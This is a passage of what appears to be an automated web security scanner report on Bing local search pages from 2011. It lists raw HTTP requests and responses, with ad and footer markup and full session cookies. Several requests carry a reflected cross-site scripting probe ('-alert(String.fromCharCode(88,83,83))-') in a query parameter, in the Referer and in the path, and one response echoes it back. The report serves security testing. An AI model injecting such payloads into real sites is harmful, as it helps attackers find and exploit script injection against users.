<a href="http://0.r.msn.com/?ld=4vTYb3z41OmApcTmMgjZO272kUkuwiwgJGWH-MppDugb83yoa0cE1lI56OWNWopGPGRawsVP1dcPY_PId7vQb2ZXSB8-xia8fz4jHzNlzIpZm553B67F7_tb9Cmjd1OAlOFIRC7T5l1CHs6HF6gWlwsdIW5ZEJ6WXxn_7e3ISKvTNc4IHakZmKPMBIJXvHjes_49ubuf9an74gdwnJN-SeGxWN9uOQBi2I8YJMuHc3KCxQ9PkJh5xUf_YWuUU84u236gy7FFhzyIYAuK-IpDCXRbT-bDsRz55Bvd7EIt_9vNUihyHtc94XtYMhE97AZVUrNVQJTI7dfPjSHFAkKrtEZPjM_MsQJmNzPTCSjL5iiTFXIwDYx2Nt81z17Wc329bzxZtEbWrQ9GZE" class="head" onclick="window.open(this.href); return false;">100 Hotels Washington DC</a>
<a href="http://0.r.msn.com/?ld=4vTYb3z41OmApcTmMgjZO272kUkuwiwgJGWH-MppDugb83yoa0cE1lI56OWNWopGPGRawsVP1dcPY_PId7vQb2ZXSB8-xia8fz4jHzNlzIpZm553B67F7_tb9Cmjd1OAlOFIRC7T5l1CHs6HF6gWlwsdIW5ZEJ6WXxn_7e3ISKvTNc4IHakZmKPMBIJXvHjes_49ubuf9an74gdwnJN-SeGxWN9uOQBi2I8YJMuHc3KCxQ9PkJh5xUf_YWuUU84u236gy7FFhzyIYAuK-IpDCXRbT-bDsRz55Bvd7EIt_9vNUihyHtc94XtYMhE97AZVUrNVQJTI7dfPjSHFAkKrtEZPjM_MsQJmNzPTCSjL5iiTFXIwDYx2Nt81z17Wc329bzxZtEbWrQ9GZE" class="body" onclick="window.open(this.href); return false;">Save up to 50% on your reservation. Book online now. Pay at the hotel.</a>
<a href="http://0.r.msn.com/?ld=4vTYb3z41OmApcTmMgjZO272kUkuwiwgJGWH-MppDugb83yoa0cE1lI56OWNWopGPGRawsVP1dcPY_PId7vQb2ZXSB8-xia8fz4jHzNlzIpZm553B67F7_tb9Cmjd1OAlOFIRC7T5l1CHs6HF6gWlwsdIW5ZEJ6WXxn_7e3ISKvTNc4IHakZmKPMBIJXvHjes_49ubuf9an74gdwnJN-SeGxWN9uOQBi2I8YJMuHc3KCxQ9PkJh5xUf_YWuUU84u236gy7FFhzyIYAuK-IpDCXRbT-bDsRz55Bvd7EIt_9vNUihyHtc94XtYMhE97AZVUrNVQJTI7dfPjSHFAkKrtEZPjM_MsQJmNzPTCSjL5iiTFXIwDYx2Nt81z17Wc329bzxZtEbWrQ9GZE" class="site" onclick="window.open(this.href); return false;">www.booking.com/Washington-DC</a>
...[SNIP]...
<li class = "ad">
<a href="http://0.r.msn.com/?ld=4v3Xpl47bMdlO24kYNUEPUDDadernmQitAmiiddfWbDbN88cdDY5lDBsSzShSyulQ_lmkPpva5Xf_328jd7YOqpmRn2DpsOpFmcgFyrTi-eRHyhTlC9qLXSkXBXk7cmjSZKKerIOF_8E4I0zS5TtKMbTMNNqWxkQ5Qx19fgcQgfa4DYx8YYqMwVc6IrWdLn8-p7dlF2VofIAkUPJ2pVeCrIbc2Y0zboeA5fm3glEPpnBIv5PX-1uFq6LqWqAHIHxfga7XaTvylhsA9FKOY2ZTUR6hef4G-SgIWWsUukRykTb2bybWFzhOLnE1L4EFiuY9i_SxW9H4QrZ24-UFgmJPeFzwUR2ApnV45E4xJHLReAPE1VAlMA8Bai0yN63h5M-kcs7of4hAmY3M9xN_tyPZnyf0-nnn8tNgAIJbi6Gq-Uu7bPErv_4Re2MY" class="head" onclick="window.open(this.href); return false;">Hotel in Washington D.C.</a>
<a href="http://0.r.msn.com/?ld=4v3Xpl47bMdlO24kYNUEPUDDadernmQitAmiiddfWbDbN88cdDY5lDBsSzShSyulQ_lmkPpva5Xf_328jd7YOqpmRn2DpsOpFmcgFyrTi-eRHyhTlC9qLXSkXBXk7cmjSZKKerIOF_8E4I0zS5TtKMbTMNNqWxkQ5Qx19fgcQgfa4DYx8YYqMwVc6IrWdLn8-p7dlF2VofIAkUPJ2pVeCrIbc2Y0zboeA5fm3glEPpnBIv5PX-1uFq6LqWqAHIHxfga7XaTvylhsA9FKOY2ZTUR6hef4G-SgIWWsUukRykTb2bybWFzhOLnE1L4EFiuY9i_SxW9H4QrZ24-UFgmJPeFzwUR2ApnV45E4xJHLReAPE1VAlMA8Bai0yN63h5M-kcs7of4hAmY3M9xN_tyPZnyf0-nnn8tNgAIJbi6Gq-Uu7bPErv_4Re2MY" class="body" onclick="window.open(this.href); return false;">There's more to enjoy! Book unique offer. Instant Service 800-996-8916</a>
<a href="http://0.r.msn.com/?ld=4v3Xpl47bMdlO24kYNUEPUDDadernmQitAmiiddfWbDbN88cdDY5lDBsSzShSyulQ_lmkPpva5Xf_328jd7YOqpmRn2DpsOpFmcgFyrTi-eRHyhTlC9qLXSkXBXk7cmjSZKKerIOF_8E4I0zS5TtKMbTMNNqWxkQ5Qx19fgcQgfa4DYx8YYqMwVc6IrWdLn8-p7dlF2VofIAkUPJ2pVeCrIbc2Y0zboeA5fm3glEPpnBIv5PX-1uFq6LqWqAHIHxfga7XaTvylhsA9FKOY2ZTUR6hef4G-SgIWWsUukRykTb2bybWFzhOLnE1L4EFiuY9i_SxW9H4QrZ24-UFgmJPeFzwUR2ApnV45E4xJHLReAPE1VAlMA8Bai0yN63h5M-kcs7of4hAmY3M9xN_tyPZnyf0-nnn8tNgAIJbi6Gq-Uu7bPErv_4Re2MY" class="site" onclick="window.open(this.href); return false;">www.InterContinental.com</a>
...[SNIP]...
<li class = "ad">
<a href="http://3915.r.msn.com/?ld=4vuAyxSvlGFq2pKPRN2Ft3GHdD5Bj8qw5XXRC9dKQ4A1MbqRTeu-RukV8lOpJ8OQO2zyMSxaTvVivFX2DlBpyuI9AfAhHF_lD_ExSQPxgl2KfHX74yBv0bK9hvVDJtZYKGDesJipM4hpKhkghNAdWCEh3UaoZWk9qeXafoTqScqVISvt1YK1Oss125IblUt2mW5U7jDrSZOBI9Yxt7v8axaocqudA7Fpg7pdp60hiNMZm_bD3SGJ5QqNmvpE8r_rDDM3lBBghUYC3Kt_Yk3A11RCexU2KtoNHRDpIECZCIprWq2184nO4OZln37dywnHmqVYDocXqpJ8MhhjkMb1wxVohPYzg_h_-xp-p4OpUXWwuqdauU1XUpkm71F2KrIbM-qm9izsUhluH1p_-EuoiEAv_p7xqeIJW6jiHZKpevt2inQTIXh3shfYILtxqZqFm3NVQJTFt6KKgzl8nzBocL_zNWVagQJmNzPerVpI9qhMAjnzHQlhLkvv4TarNPUoo4owQae_npFse2" class="head" onclick="window.open(this.href); return false;">Washington Hotels</a>
<a href="http://3915.r.msn.com/?ld=4vuAyxSvlGFq2pKPRN2Ft3GHdD5Bj8qw5XXRC9dKQ4A1MbqRTeu-RukV8lOpJ8OQO2zyMSxaTvVivFX2DlBpyuI9AfAhHF_lD_ExSQPxgl2KfHX74yBv0bK9hvVDJtZYKGDesJipM4hpKhkghNAdWCEh3UaoZWk9qeXafoTqScqVISvt1YK1Oss125IblUt2mW5U7jDrSZOBI9Yxt7v8axaocqudA7Fpg7pdp60hiNMZm_bD3SGJ5QqNmvpE8r_rDDM3lBBghUYC3Kt_Yk3A11RCexU2KtoNHRDpIECZCIprWq2184nO4OZln37dywnHmqVYDocXqpJ8MhhjkMb1wxVohPYzg_h_-xp-p4OpUXWwuqdauU1XUpkm71F2KrIbM-qm9izsUhluH1p_-EuoiEAv_p7xqeIJW6jiHZKpevt2inQTIXh3shfYILtxqZqFm3NVQJTFt6KKgzl8nzBocL_zNWVagQJmNzPerVpI9qhMAjnzHQlhLkvv4TarNPUoo4owQae_npFse2" class="body" onclick="window.open(this.href); return false;">Free Internet & Hot Breakfast Bar. Book Lowest Rates Direct!</a>
<a href="http://3915.r.msn.com/?ld=4vuAyxSvlGFq2pKPRN2Ft3GHdD5Bj8qw5XXRC9dKQ4A1MbqRTeu-RukV8lOpJ8OQO2zyMSxaTvVivFX2DlBpyuI9AfAhHF_lD_ExSQPxgl2KfHX74yBv0bK9hvVDJtZYKGDesJipM4hpKhkghNAdWCEh3UaoZWk9qeXafoTqScqVISvt1YK1Oss125IblUt2mW5U7jDrSZOBI9Yxt7v8axaocqudA7Fpg7pdp60hiNMZm_bD3SGJ5QqNmvpE8r_rDDM3lBBghUYC3Kt_Yk3A11RCexU2KtoNHRDpIECZCIprWq2184nO4OZln37dywnHmqVYDocXqpJ8MhhjkMb1wxVohPYzg_h_-xp-p4OpUXWwuqdauU1XUpkm71F2KrIbM-qm9izsUhluH1p_-EuoiEAv_p7xqeIJW6jiHZKpevt2inQTIXh3shfYILtxqZqFm3NVQJTFt6KKgzl8nzBocL_zNWVagQJmNzPerVpI9qhMAjnzHQlhLkvv4TarNPUoo4owQae_npFse2" class="site" onclick="window.open(this.href); return false;">www.HolidayInnExpress.com</a>
...[SNIP]...
<li class = "ad">
<a href="http://0.r.msn.com/?ld=4v4qmLIIlSTrcn8PDia5hE85qemRjTTKtzxiiWGXTIyFo1RuaqCstrrdGNB19Z2i_lsbpwa-0c1roKreaVYiesLRIwpruNB6970n1QIJ2tmsA6Y8qhf9U1dCDPI7HitGj6zqVhhU3TUCaKmIYHMuHhc5BSQsrrsTKquePDq_tjZPxQ7nq8w_ZmyllkcyrmLuluKM0zsqNi3Gsva3sTeFTKYqJ7OvzLxu7YyTxPdOXXiPzgn0GYfSAVZyF-vxJk3N6q0UU9AjfRCjXb75WkdOzVcHIdhNQ8dEUTmkB3Sriq0IHrUvRNtd_HnIgp7peo7atmdtEYoKg8njxhhOfRqxUTuhaBH_JG48P6IKai54owr-H2jqCE7bIOX20bx2rMniQLfJB2DBUMubz3WcGmk8JIqLmtV8Fsk07Os6IAMtQv03s1VAlMwY7T_7ysGbN0m6r5FGRr-hAmY3M9TdSxsOoVHBw6zSH2cY4P7ZVc2ee_AAQYOcdabseuBoo" class="head" onclick="window.open(this.href); return false;">washington hotels</a>
<a href="http://0.r.msn.com/?ld=4v4qmLIIlSTrcn8PDia5hE85qemRjTTKtzxiiWGXTIyFo1RuaqCstrrdGNB19Z2i_lsbpwa-0c1roKreaVYiesLRIwpruNB6970n1QIJ2tmsA6Y8qhf9U1dCDPI7HitGj6zqVhhU3TUCaKmIYHMuHhc5BSQsrrsTKquePDq_tjZPxQ7nq8w_ZmyllkcyrmLuluKM0zsqNi3Gsva3sTeFTKYqJ7OvzLxu7YyTxPdOXXiPzgn0GYfSAVZyF-vxJk3N6q0UU9AjfRCjXb75WkdOzVcHIdhNQ8dEUTmkB3Sriq0IHrUvRNtd_HnIgp7peo7atmdtEYoKg8njxhhOfRqxUTuhaBH_JG48P6IKai54owr-H2jqCE7bIOX20bx2rMniQLfJB2DBUMubz3WcGmk8JIqLmtV8Fsk07Os6IAMtQv03s1VAlMwY7T_7ysGbN0m6r5FGRr-hAmY3M9TdSxsOoVHBw6zSH2cY4P7ZVc2ee_AAQYOcdabseuBoo" class="body" onclick="window.open(this.href); return false;">Book Lowest Hotel Rates Direct! Luxurious Beds & Great Amenities.</a>
<a href="http://0.r.msn.com/?ld=4v4qmLIIlSTrcn8PDia5hE85qemRjTTKtzxiiWGXTIyFo1RuaqCstrrdGNB19Z2i_lsbpwa-0c1roKreaVYiesLRIwpruNB6970n1QIJ2tmsA6Y8qhf9U1dCDPI7HitGj6zqVhhU3TUCaKmIYHMuHhc5BSQsrrsTKquePDq_tjZPxQ7nq8w_ZmyllkcyrmLuluKM0zsqNi3Gsva3sTeFTKYqJ7OvzLxu7YyTxPdOXXiPzgn0GYfSAVZyF-vxJk3N6q0UU9AjfRCjXb75WkdOzVcHIdhNQ8dEUTmkB3Sriq0IHrUvRNtd_HnIgp7peo7atmdtEYoKg8njxhhOfRqxUTuhaBH_JG48P6IKai54owr-H2jqCE7bIOX20bx2rMniQLfJB2DBUMubz3WcGmk8JIqLmtV8Fsk07Os6IAMtQv03s1VAlMwY7T_7ysGbN0m6r5FGRr-hAmY3M9TdSxsOoVHBw6zSH2cY4P7ZVc2ee_AAQYOcdabseuBoo" class="site" onclick="window.open(this.href); return false;">www.CrownePlaza.com</a>
...[SNIP]...
<li class = "ad">
<a href="http://121663.r.msn.com/?ld=4vB9ii_LtlyevMMtl-sWDLrOKW8uoIyuXitaBVPHq1LwTTytXNMWiSNriU7uM7IBINX8Rc5HbuehfgE7hqJSCog3204Pvato689wdACPfQS4e3Iq-BmVGvJnVaqdGTVzJcj_WPqOk3aJmJTfuHy6XGj67E6DBW2-vlY-SkAakBP7CDGhAUOlVkUcXQDAj4x9bb1cXl4CjDIa94KOEoW_6hESf6QvQVCADpSNCRYYE3NNp2chbphQ9n0dI0pZR3BVoVQr2NRM-jHEVB-0N_p-PVzKVLFZYTERI23M7sAFAdROOLq7pIhoA5h2tGRKlYROvKjqx5nEILSHm8ZiIW08yR9X5id1f_mAm6l6HsYrYO5P1jZNY3D7atPM31nOKXB8ziCMGDIcjwXU5OZ0A19NE71SUHXTaAR8TGmK4APbhrr6E6ZJ25ZsZl1fLBcdeIwGIaFQoTK2nu9uqfhxTGkrRPvb5Thc9eafdECWPLQz4xO8kFpHJhJ8un3vsXuj2D2TEHIG1BHhJvPSIZjQenk8A3AcnLajdMTaUB1RKgfcqt7HygcJO1x722oJ9TctN3rxWogkDVE5di9XancCLsLOz3-O4sbG4BC0FR6fVvrp6FezhVgunBmO9qwzyVS1PSSfGRNVQJTHmxvNgdmOjb_79a99Np9rwQJmNzPaX76YUmNENInrbhWvKm-4QPoaGZ8WG_9D4NV9YvGHHx" class="head" onclick="window.open(this.href); return false;">washington hotels</a>
<a href="http://121663.r.msn.com/?ld=4vB9ii_LtlyevMMtl-sWDLrOKW8uoIyuXitaBVPHq1LwTTytXNMWiSNriU7uM7IBINX8Rc5HbuehfgE7hqJSCog3204Pvato689wdACPfQS4e3Iq-BmVGvJnVaqdGTVzJcj_WPqOk3aJmJTfuHy6XGj67E6DBW2-vlY-SkAakBP7CDGhAUOlVkUcXQDAj4x9bb1cXl4CjDIa94KOEoW_6hESf6QvQVCADpSNCRYYE3NNp2chbphQ9n0dI0pZR3BVoVQr2NRM-jHEVB-0N_p-PVzKVLFZYTERI23M7sAFAdROOLq7pIhoA5h2tGRKlYROvKjqx5nEILSHm8ZiIW08yR9X5id1f_mAm6l6HsYrYO5P1jZNY3D7atPM31nOKXB8ziCMGDIcjwXU5OZ0A19NE71SUHXTaAR8TGmK4APbhrr6E6ZJ25ZsZl1fLBcdeIwGIaFQoTK2nu9uqfhxTGkrRPvb5Thc9eafdECWPLQz4xO8kFpHJhJ8un3vsXuj2D2TEHIG1BHhJvPSIZjQenk8A3AcnLajdMTaUB1RKgfcqt7HygcJO1x722oJ9TctN3rxWogkDVE5di9XancCLsLOz3-O4sbG4BC0FR6fVvrp6FezhVgunBmO9qwzyVS1PSSfGRNVQJTHmxvNgdmOjb_79a99Np9rwQJmNzPaX76YUmNENInrbhWvKm-4QPoaGZ8WG_9D4NV9YvGHHx" class="body" onclick="window.open(this.href); return false;">Huge Savings on D.C. Trips. Plus No More Change or Cancel Fees.</a>
<a href="http://121663.r.msn.com/?ld=4vB9ii_LtlyevMMtl-sWDLrOKW8uoIyuXitaBVPHq1LwTTytXNMWiSNriU7uM7IBINX8Rc5HbuehfgE7hqJSCog3204Pvato689wdACPfQS4e3Iq-BmVGvJnVaqdGTVzJcj_WPqOk3aJmJTfuHy6XGj67E6DBW2-vlY-SkAakBP7CDGhAUOlVkUcXQDAj4x9bb1cXl4CjDIa94KOEoW_6hESf6QvQVCADpSNCRYYE3NNp2chbphQ9n0dI0pZR3BVoVQr2NRM-jHEVB-0N_p-PVzKVLFZYTERI23M7sAFAdROOLq7pIhoA5h2tGRKlYROvKjqx5nEILSHm8ZiIW08yR9X5id1f_mAm6l6HsYrYO5P1jZNY3D7atPM31nOKXB8ziCMGDIcjwXU5OZ0A19NE71SUHXTaAR8TGmK4APbhrr6E6ZJ25ZsZl1fLBcdeIwGIaFQoTK2nu9uqfhxTGkrRPvb5Thc9eafdECWPLQz4xO8kFpHJhJ8un3vsXuj2D2TEHIG1BHhJvPSIZjQenk8A3AcnLajdMTaUB1RKgfcqt7HygcJO1x722oJ9TctN3rxWogkDVE5di9XancCLsLOz3-O4sbG4BC0FR6fVvrp6FezhVgunBmO9qwzyVS1PSSfGRNVQJTHmxvNgdmOjb_79a99Np9rwQJmNzPaX76YUmNENInrbhWvKm-4QPoaGZ8WG_9D4NV9YvGHHx" class="site" onclick="window.open(this.href); return false;">www.Travelocity.com/Hotels</a>
...[SNIP]...
<li class = "ad">
<a href="http://0.r.msn.com/?ld=4vCM4cUoN3X0V-923Il1JMW50uThent7S9kODROLilGu5DDo3RIo5NG9TZddlXfVxAVuo_qK0af68HUErvxMNTViQAF44z206Kd-86_3Wtq7tkSygLt8WI3k_cDbiY4-17T7G7FqLFBAPbCvN_mFcB53Yw5nNFYFielMSXOFYOq2jJTDFJRmiJ17J1PQVWmftnSLxbnFYFrGTXAVxLlOtuVpN-3DLvk4_z7ZKRwnYEYSt050hQNN9u1QS0KJEVdlTrmrM1LToRam4AcZfzaERfI1xaoKGa_alKUVR01uhr37TkphlIlJeISWO1se_i23t0HkJbEuGCifoIWmU_F02VO7Tp-aX6-4Am6nuTMGeOEg41VAlMR15s75aBe-jc2PGKq5J8ghAmY3M9bGmXd-EXvKRfXT7j18dIc8G6hkx0wMuy1EZ7IGJtfGU" class="head" onclick="window.open(this.href); return false;">Hotel in Washington D.C.</a>
<a href="http://0.r.msn.com/?ld=4vCM4cUoN3X0V-923Il1JMW50uThent7S9kODROLilGu5DDo3RIo5NG9TZddlXfVxAVuo_qK0af68HUErvxMNTViQAF44z206Kd-86_3Wtq7tkSygLt8WI3k_cDbiY4-17T7G7FqLFBAPbCvN_mFcB53Yw5nNFYFielMSXOFYOq2jJTDFJRmiJ17J1PQVWmftnSLxbnFYFrGTXAVxLlOtuVpN-3DLvk4_z7ZKRwnYEYSt050hQNN9u1QS0KJEVdlTrmrM1LToRam4AcZfzaERfI1xaoKGa_alKUVR01uhr37TkphlIlJeISWO1se_i23t0HkJbEuGCifoIWmU_F02VO7Tp-aX6-4Am6nuTMGeOEg41VAlMR15s75aBe-jc2PGKq5J8ghAmY3M9bGmXd-EXvKRfXT7j18dIc8G6hkx0wMuy1EZ7IGJtfGU" class="body" onclick="window.open(this.href); return false;">Impeccable Service & Impossible to Beat Location. Book our Lowest Rate</a>
<a href="http://0.r.msn.com/?ld=4vCM4cUoN3X0V-923Il1JMW50uThent7S9kODROLilGu5DDo3RIo5NG9TZddlXfVxAVuo_qK0af68HUErvxMNTViQAF44z206Kd-86_3Wtq7tkSygLt8WI3k_cDbiY4-17T7G7FqLFBAPbCvN_mFcB53Yw5nNFYFielMSXOFYOq2jJTDFJRmiJ17J1PQVWmftnSLxbnFYFrGTXAVxLlOtuVpN-3DLvk4_z7ZKRwnYEYSt050hQNN9u1QS0KJEVdlTrmrM1LToRam4AcZfzaERfI1xaoKGa_alKUVR01uhr37TkphlIlJeISWO1se_i23t0HkJbEuGCifoIWmU_F02VO7Tp-aX6-4Am6nuTMGeOEg41VAlMR15s75aBe-jc2PGKq5J8ghAmY3M9bGmXd-EXvKRfXT7j18dIc8G6hkx0wMuy1EZ7IGJtfGU" class="site" onclick="window.open(this.href); return false;">www.InterContinental.com</a>
...[SNIP]...
<li class = "ad">
<a href="http://0.r.msn.com/?ld=4vDARFFaJ3GN0boE5Y8-dpjlenieiuEVv5-btxsOGlpWf-FEugUZfCFJMpNyNC00av6Ygfc5FPwzc_VuSzMQujAElgLvVkvdiQtYv3_K6z294mwkKCiXg_qh8A88fjQH0iwnp6oon70l41OYM9l_Qlavd9iD58gIShNR9g2BibkwfUeWHbX2V2hZcAyCZaYcC9SCGyOXW7jc4LXt1AtK8r_MNQ7e0-vWRUDVsPRwO1DruPEzLz3WY4VRqiv76lj_lo5a2nVpl0EjtKkt1eNpEaSNDplwQoC3hCsouNjdGtvmOzbRH6peAh9ku5MzQO0F2jNVQJTLAE-ivmqZRaU4ycXd_1VbQQJmNzPZaOlG_dIfkO94NwCSDig_Fwgx7s79mvYqvUt1jP2i2j" class="head" onclick="window.open(this.href); return false;">100 Hotels Washington DC</a>
<a href="http://0.r.msn.com/?ld=4vDARFFaJ3GN0boE5Y8-dpjlenieiuEVv5-btxsOGlpWf-FEugUZfCFJMpNyNC00av6Ygfc5FPwzc_VuSzMQujAElgLvVkvdiQtYv3_K6z294mwkKCiXg_qh8A88fjQH0iwnp6oon70l41OYM9l_Qlavd9iD58gIShNR9g2BibkwfUeWHbX2V2hZcAyCZaYcC9SCGyOXW7jc4LXt1AtK8r_MNQ7e0-vWRUDVsPRwO1DruPEzLz3WY4VRqiv76lj_lo5a2nVpl0EjtKkt1eNpEaSNDplwQoC3hCsouNjdGtvmOzbRH6peAh9ku5MzQO0F2jNVQJTLAE-ivmqZRaU4ycXd_1VbQQJmNzPZaOlG_dIfkO94NwCSDig_Fwgx7s79mvYqvUt1jP2i2j" class="body" onclick="window.open(this.href); return false;">Save up to 50% on your reservation. Book online now. Pay at the hotel.</a>
<a href="http://0.r.msn.com/?ld=4vDARFFaJ3GN0boE5Y8-dpjlenieiuEVv5-btxsOGlpWf-FEugUZfCFJMpNyNC00av6Ygfc5FPwzc_VuSzMQujAElgLvVkvdiQtYv3_K6z294mwkKCiXg_qh8A88fjQH0iwnp6oon70l41OYM9l_Qlavd9iD58gIShNR9g2BibkwfUeWHbX2V2hZcAyCZaYcC9SCGyOXW7jc4LXt1AtK8r_MNQ7e0-vWRUDVsPRwO1DruPEzLz3WY4VRqiv76lj_lo5a2nVpl0EjtKkt1eNpEaSNDplwQoC3hCsouNjdGtvmOzbRH6peAh9ku5MzQO0F2jNVQJTLAE-ivmqZRaU4ycXd_1VbQQJmNzPZaOlG_dIfkO94NwCSDig_Fwgx7s79mvYqvUt1jP2i2j" class="site" onclick="window.open(this.href); return false;">www.booking.com/Washington-DC</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocalbusiness&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLDP&amp;P5=&amp;P6=&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=YN165x3137627&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2fdetails.aspx%3flid%3dYN165x3137627%26q%3dRestaurants%26qt%3dyp%26tid%3dde23686c9d194a6fb644dc125b68270e%26FORM%3dLLSV" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.5. http://www.bing.com/local/locationselector.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/locationselector.aspx

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(String.fromCharCode(88,83,83))-'6f0e1fe887b
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Sat, 12 Feb 2011 00:38:51 GMT
Last-Modified: Fri, 11 Feb 2011 22:38:51 GMT
X-BM-TraceID: bd57401dd9704959b64d06f9e82d5827
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001212
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 25985


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
<li><a href="http://www.msn.com/" onmousedown="return si_T('&amp;ID=FD,36.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,38.1')">Hotmail</a>
...[SNIP]...
<span id="footerLinksControl_businessListingLabel">Add or change your business listing in the <a id="addBusinessLink" href="https://ssl.search.live.com/listings/default.aspx" onclick="VE_AnalyticsEngine.LogDefaultClick(this.id, document.getElementById(this.id), '', '', '');"><span>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,50.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,52.1')">Privacy</a> | </li><li><a href="http://g.msn.com/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,54.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,56.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.msn.com/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,58.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808582.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">Help</a> | </li><li><a href="https://feedback.live.com/default.aspx?productkey=wlsearchlocal&amp;locale=en-us&amp;P1=footerlivelocal&amp;P2=&amp;P3=&amp;P4=LLSV&amp;P5=&amp;P6=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&amp;P7=Original&amp;P8=&amp;P9=&amp;P10=&amp;P11=&amp;P13=&amp;searchtype=LiveLocalSearch&amp;backurl=http%3a%2f%2fwww.bing.com%3a80%2flocalsearch%2flocationselector.aspx%3fwhere%3daa461'-alert(String.fromCharCode(88%252c83%252c83))-'6f0e1fe887b%26FORM%3dLLSV" id="sb_feedback" onmousedown="return si_T('&amp;ID=FD,62.1')">Tell us what you think</a>
...[SNIP]...

5.6. http://www.bing.com/local/us/co/colorado%20springs/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /local/us/co/colorado%20springs/?&form=llsv HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/locationselector.aspx?where=aa461'-alert(String.fromCharCode(88%2c83%2c83))-'6f0e1fe887b&FORM=LLSV
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 749f07315b7f481d9bcac535c037827d
